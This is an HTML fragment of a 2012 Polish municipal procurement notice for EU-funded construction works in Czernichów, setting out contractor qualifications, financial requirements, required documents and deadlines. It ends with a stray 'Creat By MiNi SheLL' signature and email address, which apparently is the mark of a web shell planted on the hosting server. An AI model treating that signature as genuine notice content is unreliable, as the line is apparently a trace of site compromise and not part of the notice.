</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania ww warunku Wykonawca wykaże, że dysponuje lub będzie dysponował przynajmniej jedną osobą posiadającą uprawnienia do kierowania robotami 
budowlanymi o specjalności:
-	konstrukcyjno - budowlanej,
-	instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,
-	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych 
i elektroenergetycznych. 
Warunek uznaje się za spełniony, jeżeli Wykonawca przedstawi co najmniej jedną osobę 
posiadającą wszystkie wymagane uprawnienia lub kilka osób posiadających jedno lub kilka 
z wymienionych uprawnień, osoby te łącznie powinny dysponować wszystkimi wymaganymi w specyfikacji uprawnieniami.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie  spełnienia ww warunku wykonawca przedstawi informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w której wykonawca posiada rachunek, potwierdzający wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawiona nie wcześniej niż 3 miesiące przed upływem składania ofert nie mniejszą niż 5 000 000,00 PLN oraz przedłoży opłaconą polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o 
wartości nie mniejszej niż  4 000 000,00 PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Formularz Ofertowy - druku A
2)	Wzór umowy - druk B
3)	Kosztorys ofertowy sporządzony przez Wykonawcę zgodnie z  dokumentacją 
techniczną, natomiast  przedmiar robót jest dokumentem pomocniczym służącym do wyliczenia ceny ryczałtowej.
4)	Pełnomocnictwo (jeżeli jest wymagane) udzielone reprezentantowi wykonawców 
ubiegających się o udzielenie zamówienia publicznego wspólnie.
5)	Dokument potwierdzający wniesienie przez Wykonawcę wymaganego wadium.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2.	Zamawiający zgodnie z art. 144 ust. 1 Ustawy Prawo Zamówień Publicznych 
dopuszcza zmianę terminu wykonania robót pod warunkiem:
a)	wystąpienia niekorzystnych warunków atmosferycznych (wysokie temperatury, 
intensywne ulewy, długie opady deszczu, śnieżyce, temperatura poniżej 0 st. (z 
wyłączeniem okresu: 15 listopada - 15 marca) mające faktyczny wpływ na realizacje robót budowlanych prowadzonych na otwartej przestrzeni;
b)	jeżeli konieczność wykonania robót dodatkowych lub zamiennych wymaga większego nakładu pracy lub technologia wykonania robót wymaga dłuższego terminu 
wykonania danego etapu przedmiotu zamówienia,
c)	wstrzymania robót przez inny uprawniony organ (np. wskutek kontroli, wypadku na budowie, itp.);
d)	w wyniku interwencji osób trzecich, których interwencja ma bezpośredni wpływ na realizację przedmiotu zamówienia (np. inny wykonawca, z którym Zamawiający 
zawarł umowę na realizację robót lub usługi tym samym obiekcie spóźnia się z 
robotami, których wykonanie warunkuje terminowe wykonanie robót objętych 
niniejszą umową; osoba trzecia ma interes prawny i faktyczny w zakresie prowadzonej inwestycji).
e)	konieczności zmiany technologii wykonania prac w przypadku czynników 
zewnętrznych niemożliwych do przewidzenia na etapie przygotowania dokumentacji projektowej, takich, jak: niewybuchy, sieci wodociągowe, kanalizacyjne i 
teletechnicznie nie naniesione na mapach, uwarunkowania geologiczne (jeśli nie 
przeprowadzono wcześniej stosownych badań), konflikty społeczne związane z 
prowadzeniem inwestycji (w tym reakcje stowarzyszeń i fundacji ekologicznych, roszczenia (w tym sądowe) o zwrot działki, itp.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.czernichow.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Czernichów z siedzibą w Tresnej, ul. Żywiecka 2, 34-311 Czernichów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.09.2012 godzina 09:00, miejsce: Urząd Gminy Czernichów z siedzibą w Tresnej, ul. Żywiecka 2, 34-311 Czernichów, biuro 7.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt realizowany w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013. Priorytet VI Zrównoważony rozwój miast. Działania 6.2. Rewitalizacja obszarów zdegradowanych. Poddziałanie 6.2.2. Rewitalizacja - małe miasta nr projektu 1080..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com